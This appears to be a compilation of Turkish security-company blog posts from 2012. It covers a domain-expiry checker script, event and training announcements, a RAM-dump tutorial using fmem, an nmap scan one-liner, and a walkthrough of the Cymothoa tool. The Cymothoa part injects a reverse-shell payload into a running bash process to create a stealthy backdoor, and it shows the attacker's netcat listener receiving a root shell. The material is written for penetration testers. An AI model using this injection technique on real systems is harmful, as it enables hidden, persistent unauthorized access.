Bu yapıda en önemli adım ise alan adlarının kayıt sürelerinin dolması ile başlayan süreç olmaktadır. Her ne kadar bellek boyut/fiyat oranları artsada insan belleği aksine zamanla dolmakta ve yeni bilgilerin kalıcılığı azalmaktadır. Bu perspektiften bakıldığında yaşanabilecek en büyük sorunlardan bir tanesi sahip olunan alan adının geçerlilik süresinin dolması ve bunula başlayan süreçte alan adının yenilenmeyerek sahipliğinin kaybedilmesi olabilmektedir. Mevcut alan adına ait geçerlilik süresi linux sistemlerde bulunan whois komutu ile görülebilmektedir. Kullanımı whois domain adı şeklinde olmaktadır. Örnek bir kullanımı ve ilgili çıktı bölümü aşağıda belirtildiği gibi olmaktadır.

# whois bga.com.tr
…
…
** Domain Servers:
ns1.bga.com.tr    50.22.202.162
ns2.bga.com.tr    50.22.202.162

** Additional Info:
Created on…………..: 2010-Jun-01.
Expires on…………..: 2012-May-31.

Görüldüğü gibi alan adına dair geçerlilik süresi 2012 31 Mayıs tarihi ile dolmaktadır. Bu işlem ara ara el ile gerçeklenerek kontroller gerçekleştirilebilir. Ancak birden fazla alan adına sahip kişi yada kurumlar için bu işlem zahmetli olabilmekte, yenilenme ve sonrasındaki sürecinde geçirilmesi durumunda ilgili domain elden çıkabilmektedir. Bütün bu işlemleri otomatik olarak kontrol eden ve belirlenen sürenin kalmasından itibaren mail yolu ile bilgilendirme yapan yazılımın kullanımına dair ayrıntılar aşağıda görüldüğü gibi olmaktadır. Öncelikle yazılım BGA yazılım deposunden temin edilmelidir, yapılandırma dosyası ihtiyaca göre belirlenerek oluşturulmalı ve son olarak çalıştırma hakları verilerek belirli zamanlarda çalıştırılmalıdır.

# wget http://cvs.bga.com.tr/DomOut.tgz
# tar -zxvf DomOut.tgz

Gerekli yazılımların temin edilerek kurulmasının ardından DomOut yapılandırması belirlenerek çalıştırılması sağlanabilmektedir.

# wget http://effbot.org/media/downloads/elementtree-1.2-20040618.tar.gz
# tar -zxvf elementtree-1.2-20040618.tar.gz
# cd elementtree-1.2-20040618
# python setup.py install

Ardından DomOut paketi açılarak yapılandırma dosyası ihtiyaca göre oluşturulmalıdır.

# tar -zxvf DomOut.tgz

Yazılım ile birlikte örnek bir yapılandırma dosyası gelmektedir. Dosya içeriği aşağıdaki gibi olmaktadır.

# cat DomOut.conf

<?xml version=”1.0″?>
<domout>
<email>
<server>localhost</server>
<default_mail_to>uyari@bga.com.tr</default_mail_to>
<sender>DomOut@bga.com.tr</sender>
</email>

<domain>
<name>bga.com.tr</name>
<expire_day>121</expire_day>
</domain>

<domain>
<name>siberguvenlik.org</name>
<mail_to>info@siberguvenlik.org</mail_to>
<expire_day>378</expire_day>
</domain>

</domout>

İlgili yapılandırma değerleri ve sonucunda yazılımın çalıştırılarak ürettiği mevcut çıktı aşağıdaki gibi olmaktadır.

email: Bu bölümde e-postanın gönderilmesi işini kotaracak olan sunucu bilgileri yer almaktadır.
domain: Bu bölümde geçerlilik süresi kontrolü yapılmak istenen alan adına ait bilgiler yer almaktadır. Burada dikkat edilmesi gereken husus her domain için ayrı ayrı e-posta belirtilebilmektedir. Eğer belirtilmezse email kısmında default_mail_to ile belirtilen e-posta adresi kullanılmaktadır. domain içerisinde mail_to ile belirtilen e-posta adresinin expire_day ile belirlenen parametreden önce olması gerekmektedir. expire_day parametresi en son belirtilen parametre olmalıdır. Örnek yapılandırma dosyası içerisinde belirtilen parametrelerin sırası ile oluşturulan yapıladırmalar sorunsuz çalışacaktır.

Örnek yapılandırma ile bga.com.tr alan adı geçerlilik süresinin 121 gün kalması itibari ile default_mail_to ile belirtilen e-posta adresine bilgilendirme mesajı gönderilecektir. Aynı şekilde siberguvenlik.org alan adı geçerlilik süresinin 378 gün kalması itibari ile mail_to ile belirtilen e-posta adresine bilgilendirme mesajı gönderilecektir.

Betiğin çalıştırılması için ise aşağıdaki şekilde olmaktadır.
#./DomOut.py -f DomOut.conf
bga.com.tr -> 120 -> 121
siberguvenlik.org -> 377 -> 378

Sonuç olarak alan adına ait yönlendirmelerin doğru bir şekilde çalışabilmesi için öncelikle alan adı sahipliğinin doğru kişi veya kurumda olması gerekmektedir. Birden fazla alan adı geçerlilik süresinin kontrolü otomatik olarak DomOut yazılımı ile kolay bir şekilde gerçekleştirilebilmektedir.

Ömer ALBAYRAK

2012 yılı detay eğitim takvimi 

2012 yılı detay etkinlik takvimi 

Şubat 2012 Etkinlikleri

2 Şubat 2012   Gelişim Platformu Bilgi Güvenliği Semineri

25 Şubat 2012 Siber Suç Aracı Olarak Kötücül Yazılımlar

29 Şubat 2012 Uluslararası İstihbarat Ve Gözetim Teknolojileri Konferansı (EMEA Intelligence)

Şubat 2012 Eğitimleri

10-12 Şubat 2012     Ağ ve Güvenlik Yöneticileri için Linux Eğitimi (Ankara)

15-17 Şubat 2012     Uygulamalı Ağ güvenliği Eğitimi (Ankara)

20-23 Şubat 2012     Network Forensics Eğitimi (Ankara)*

27 Şubat-02 Mart     Beyaz Şapkalı Hacker(C.E.H) Eğitimi (Ankara)

İlgilenenler  http://www.bga.com.tr/calismalar/dns_ddos.pdf   adresinden yazıyı indirebilir.

NetSec Ağ ve Bilgi Güvenliği Topluluğu 25 Şubat 2012′de “Siber Savaş Aracı Olarak Kötücül Yazılımlar” konusunda bilgi paylaşımı ve tanışma amaçlı Microsoft Türkiye sponsorluğunda  Bellevue Residence’da  buluşuyor.

Buluşmada “Social Network Malware Attacks – Sosyal ortamlarda karşılaşılan kötücül yazılımlar”,  ”Android dünyasının zararlı yazılımları”,  ”Kötücül Yazılımlar (malware) analizinde kullanılan temel yöntem ve araçlar”, “Dinamik analiz araçlarının modern malware ile imtihanı”,  ve “dünyada kötücül yazılımların yayılması ile ilgili olarak yapılan araştırma sonucu oluşan SIR raporu ” konulu 5 farklı sunum yapılacaktır.

Buluşmanın temel amacı bilgi güvenliği sektörü çalışanlarının biraraya gelip tanışması, iş birliktelerini arttırması ve bilgi paylaşımıdır.

Etkinlik CISSP sertifikası sahipleri için 4 CPE değerindedir.

Etkinlik Adı	Netsec Topluluk Buluşması / Siber Savaş Aracı Olarak Kötücül Yazılımlar
Düzenleyen	NetSec Topluluğu, Bilgi Güvenliği AKADEMİSİ
Sponsor	Microsoft Türkiye
Tarih/Saat	25 Şubat 2012 Cumartesi Saat 12:30-17:00
Yer
Kayıt	Etkinliğe kayıt olmak şartıyla tüm bilgi güvenliği uzmanları, meraklıları katılabilir.
Katılımcıya Kazançları	Sektör içinde çalışanlar ile tanışma, güncel siber tehditler konusunda bilgi alışverişi, iş birliği ve network oluşturma.
Hedef Kitle	Bilgi güvenliği yöneticileri Ağ ve güvenlik mühendisleri Hosting firmaları/ISP’ler Telekom firmaları Kamu kurum ve kuruluşları Yazılımcılar
Ücret – Kontenjan	Etkinliğimiz ücretsiz olup etkinlik için kontenjan sınırlıdır. Lütfen katılım durumunuz kesinse kayıt olunuz.
Etkinlik Programı	12:30-13:00 Tanışma ve Etkinlik Açılış Konuşması 13:00-13:30 Microsoft Security Intelligence Report (SIR) 13:30-14:15 Malware Analizinde Kullanılan Temel Yöntem ve Araçlar                        Huzeyfe ÖNAL / BGA 14:15-14:30 ARA 14:30-15:15 Android Zararlı Yazılım Analizi                       Mert SARICA /IBTech 15:15-16:00 Social Network Malware Attacks                       Halil ÖZTÜRKCİ / ADEO 16:00-16:15 ARA 16:15-17:00 Dinamik Analiz Araçlarının Modern Malware ile İmtihanı                       Osman PAMUK / TÜBİTAK

İletişim için lütfen  bilgi@lifeoverip.net adresine e-posta gönderiniz..

Ulaşım

Bellevue Residence Levent Mahallesi, Aydın Sokak. No:7 Levent, 34340 İstanbul/Türkiye

NetSec Topluluğu Hakkında: http://www.lifeoverip.net/netsec-listesi/

Bilgi Güvenliği AKADEMİSİ olarak takipçilerimizden ve öğrencilerimizden aldığımız soruların hatırı sayılır bir kısmını sertifika sınavlarına giriş konusu oluşturmaktadır.

Her sertifika sınavı için farklı bir prosedür izlenmesi gerektiği için ayrı ayrı hepsini yazmayı planlıyoruz. İlk olarak Türkiye’de yetkili eğitim merkezi olduğumuz Ec-council’a ait CEH, ECSA/LPT, CHFI sertifikalarına ait sınava giriş prosedürünü yayınlıyoruz. Sizlerden gelecek geribildirimlerle CISSP ve diğer sertifika sınavlarına giriş prosedürlerini de Türkçe olarak yayınlamayı planlıyoruz.

Kurulumu
wget http://hysteria.sk/~niekt0/foriana/fmem_current.tgz

tar zxvf fmem_current.tgz

cd fmem_1.6-0

# make
rm -f *.o *.ko *.mod.c Module.symvers Module.markers modules.order \.*.o.cmd \.*.ko.cmd \.*.o.d
rm -rf \.tmp_versions
make -C /lib/modules/`uname -r`/build SUBDIRS=`pwd` modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.38-11-generic’
CC [M] /root/fmem_1.6-0/lkm.o
LD [M] /root/fmem_1.6-0/fmem.o
Building modules, stage 2.
MODPOST 1 modules
CC /root/fmem_1.6-0/fmem.mod.o
LD [M] /root/fmem_1.6-0/fmem.ko
make[1]: Leaving directory `/usr/src/linux-headers-2.6.38-11-generic’

# ./run.sh
Module: insmod fmem.ko a1=0xffffffff8106e590 : OK
Device: /dev/fmem
—-Memory areas: —–
reg00: base=0×000000000 ( 0MB), size= 2048MB, count=1: write-back
reg01: base=0×080000000 ( 2048MB), size= 512MB, count=1: write-back
reg02: base=0x0a0000000 ( 2560MB), size= 128MB, count=1: write-back
reg03: base=0x0a8000000 ( 2688MB), size= 64MB, count=1: write-back
reg04: base=0×100000000 ( 4096MB), size= 1024MB, count=1: write-back
reg05: base=0×140000000 ( 5120MB), size= 128MB, count=1: write-back
reg06: base=0x0b0000000 ( 2816MB), size= 256MB, count=1: write-combining
———————–
!!! Don’t forget add “count=” to dd !!!

Kullanımı
# dd if=/dev/fmem of=… bs=1MB count=…

Örnek;
# dd if=/dev/fmem of=/tmp/memory.dump bs=10MB count=2048
dd: reading `/dev/fmem’: Bad address
286+0 records in
286+0 records out
2860000000 bytes (2.9 GB) copied, 34.6138 s, 82.6 MB/s

/tmp/memory.dump altında ram imajını bulabilirsiniz.

Yazar:
Ozan UÇAR
ozan.ucar@bga.com.tr

• Uygulamalı Ağ Güvenliği Eğitimi (Ankara-İstanbul)

Eğitim Tarihleri:
Ankara: 15-17 Şubat 2012
İstanbul:3,4,10 Mart 2012 (Hafta sonu programı)
Eğitim içeriği ve detaylar için : http://www.bga.com.tr/uygulamali-ag-guvenligi-egitimi-ankaraistanbul/

• Ağ ve Güvenlik Yöneticileri için Linux Eğitimi (Ankara-İstanbul)

Eğitim Tarihleri:
Ankara:10-12 Şubat 2012
İstanbul: 6-8 Mart 2012
Eğitim içeriği ve detaylar için : http://www.bga.com.tr/ag-ve-guvenlik-yoneticileri-icin-linux-egitimi-ankaraistanbul/

• Pfsense Güvenlik Duvarı Eğitimi (Ankara-İstanbul)

Eğitim Tarihleri:
Ankara: 15-17 Şubat 2012
İstanbul:27-29 Ocak 2012
Eğitim içeriği ve detaylar için: http://www.bga.com.tr/pfsense-guvenlik-duvari-egitimi-istanbul/

Pentest çalışmalarında, hedef sisteme erişim elde edildikden sonra sistemde kalıcı hale gelmek için arka kapılar oluşturulur.Bu konuda geliştirilen tekniklerden biri, çalışan bir process’e kod enjekte etmekdir.

Bu yöntemle, process’in dosya sistemindeki binary’sine herhangi bir zarar verilmediği için süreç RAM’de devam eder. Dolayısıyla, kendini diske yazan backdoor’lara göre tespit edilmesi daha da güçtür. Bir başka yazıda, analiz teknikleri yer alacaktır.

Cymothoa, çalışan bir process’e kod enjekte eden casus bir yazılımdır.Hali hazırda kendi üzerinde bulunan shellcode’ları enjekte ederek saldırgana uzakdan yönetim ve sistemde görünmez olma imkanı sağlar.

Kullanım parametreleri,

# ./cymothoa
_
_ | |
____ _ _ ____ ___ _| |_| |__ ___ _____
/ ___) | | | \ / _ (_ _) _ \ / _ \(____ |
( (___| |_| | | | | |_| || |_| | | | |_| / ___ |
\____)\__ |_|_|_|\___/ \__)_| |_|\___/\_____|
(____/
Ver.1 (beta) – Runtime shellcode injection, for stealthy backdoors…

By codwizard (codwizard@gmail.com) and crossbower (crossbower@gmail.com)
from ES-Malaria by ElectronicSouls (http://www.0×4553.org).

Usage:
cymothoa -p <pid> -s <shellcode_number> [options]

Main options:
-p process pid
-s shellcode number
-l memory region name for shellcode injection (default /lib/ld)
search for “r-xp” permissions, see /proc/pid/maps…
-m memory region name for persistent memory (default /lib/ld)
search for “rw-p” permissions, see /proc/pid/maps…
-h print this help screen
-S list available shellcodes

Injection options (overwrite payload flags):
-f fork parent process
-F don’t fork parent process
-b create payload thread (probably you need also -F)
-B don’t create payload thread
-w pass persistent memory address
-W don’t pass persistent memory address
-a use alarm scheduler
-A don’t use alarm scheduler
-t use setitimer scheduler
-T don’t use setitimer scheduler

Payload arguments:
-j set timer (seconds)
-k set timer (microseconds)
-x set the IP
-y set the port number
-r set the port number 2
-z set the username (4 bytes)
-o set the password (8 bytes)
-c set the script code (ex: “#!/bin/sh\nls; exit 0″)
escape codes will not be interpreted…

Payload Listesi

# ./cymothoa -S

0 – bind /bin/sh to the provided port (requires -y)
1 – bind /bin/sh + fork() to the provided port (requires -y) – izik <izik@tty64.org>
2 – bind /bin/sh to tcp port with password authentication (requires -y -o)
3 – /bin/sh connect back (requires -x, -y)
4 – tcp socket proxy (requires -x -y -r) – Russell Sanford (xort@tty64.org)
5 – script execution (see the payload), creates a tmp file you must remove
6 – forks an HTTP Server on port tcp/8800 – http://xenomuta.tuxfamily.org/
7 – serial port busybox binding – phar@stonedcoder.org mdavis@ioactive.com
8 – forkbomb (just for fun…) – Kris Katterjohn
9 – open cd-rom loop (follows /dev/cdrom symlink) – izik@tty64.org
10 – audio (knock knock knock) via /dev/dsp – Cody Tubbs (pigspigs@yahoo.com)
11 – POC alarm() scheduled shellcode
12 – POC setitimer() scheduled shellcode
13 – alarm() backdoor (requires -j -y) bind port, fork on accept
14 – setitimer() tail follow (requires -k -x -y) send data via upd

Örnek Kullanımı

Shellcode enjekte etmek istediğiniz process’in process id’sini belirtmeniz yeterli. /bin/bash kabuğuna bir bakalım,

# ps ax| grep bash
1725 tty1 S 0:00 -bash
1742 tty1 S+ 0:00 /bin/bash /usr/bin/startx
1959 pts/0 Ss 0:00 bash
1991 pts/0 S+ 0:00 grep –color=auto bash

“bash” kabuğunun pid değeri 1959

Hedef sistemden, reverse shell elde etmek için 3 numaralı  payload’ı kullanacağız.

# ./cymothoa -p 1959 -s 3 -x 192.168.1.6 -y 4443
[+] attaching to process 1959

register info:
———————————————————–
eax value: 0xfffffe00 ebx value: 0xffffffff
esp value: 0xbfcab388 eip value: 0xb7766430
————————————————————

[+] new esp: 0xbfcab384
[+] payload preamble: fork
[+] injecting code into 0xb7767000
[+] copy general purpose registers
[+] detaching from 1959

[+] infected!!!

Parametrelerin açıklamaları;

-p = /bin/bash process id’si

-s = 3. sıradaki back connect payload’ı

-x = back connect yapacağı ip adresi (saldırganın ip adresi)

-y = back connect yapacağı port numarası

Saldırgan, portu dinleme moduna aldığında kurban sistemden shell erişimi elde etmiş olur.

ozanus@localhost:~$ nc -vv -l 4443

Connection from 192.168.1.9 port 4443 [tcp/*] accepted
dir
Makefile cymothoa hexdump_to_cstring.pl personalization.h udp_server
bgrep.c cymothoa.h payloads.h syscalls.txt
uname -a
Linux seclabs.bga.com.tr 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
id
uid=0(root) gid=0(root) groups=0(root)

 

Yazar:
Ozan UÇAR
ozan.ucar@bga.com.tr

Linux komutu satırı veya herhangi bir betik dili (python, ruby ve ya perl) özellikle sızma testlerinde adımları otomatize ederek iş hızını artırmaktadır.

192.168.1.0/24 ağı için bu işlem aşağıdaki şekilde linux komut satırından gerçekleştirilebilmektedir.

# nmap -n -PN -sT -p 80,443 192.168.1.1-254 –open | grep “report” | cut -d ” ” -f5 192.168.1.2 192.168.1.4 192.168.1.31 192.168.1.37